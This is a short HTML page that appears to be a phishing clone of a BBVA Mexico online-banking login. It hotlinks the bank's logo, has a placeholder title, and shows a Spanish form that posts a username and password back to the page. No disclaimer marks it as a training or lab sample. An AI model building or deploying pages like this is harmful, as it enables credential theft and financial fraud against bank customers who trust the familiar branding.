<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<style>
   body {
	background: rgb(32,0,56);
    background: linear-gradient(90deg, rgba(32,0,56,1) 0%, rgba(89,9,121,1) 35%, rgba(139,0,116,0.9934348739495799) 100%);
	font-family: Helvetica, Sans-Serif;
    font-size: 10pt;
	}
	.div-center {
		border-style: outset;
		width: 20%;
		height: 50%;
	  	box-shadow: 3px 5px 10px #ffffff;
	  	position: fixed;
	  	top: 50%;
	  	left: 50%;
	  	transform: translate(-50%, -50%);
	  	-webkit-transform: translate(-50%, -50%);
	  	-moz-transform: translate(-50%, -50%);
	  	-o-transform: translate(-50%, -50%);
		-ms-transform: translate(-50%, -50%);
	}
</style>
<body>
	<center>
	  	<div class="div-center">
	  		<img src="https://www.bbva.mx/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg" alt="BBVA" style="padding-top: 20px; width:125px; height:75px;">
	  		<div style="padding: 10px 30px;">
	        <form action="" method="post">
  				<p>Usuario</p>
				<div class="space-m"></div>
				<input type="text" class="round" type="user" name="name">

				<p>Password</p>
  				<div class="space-m"></div>
  				<input type="password" class="round" type="user" name="pass">

  				<div class="space-m"></div>
  				<div class="space-m"></div>
  				<button name="submit" value="Submit" class="boton">Iniciar sesion

	  			</form>
	  		</div>

	  	</div>
	</center>
</body>
</html> 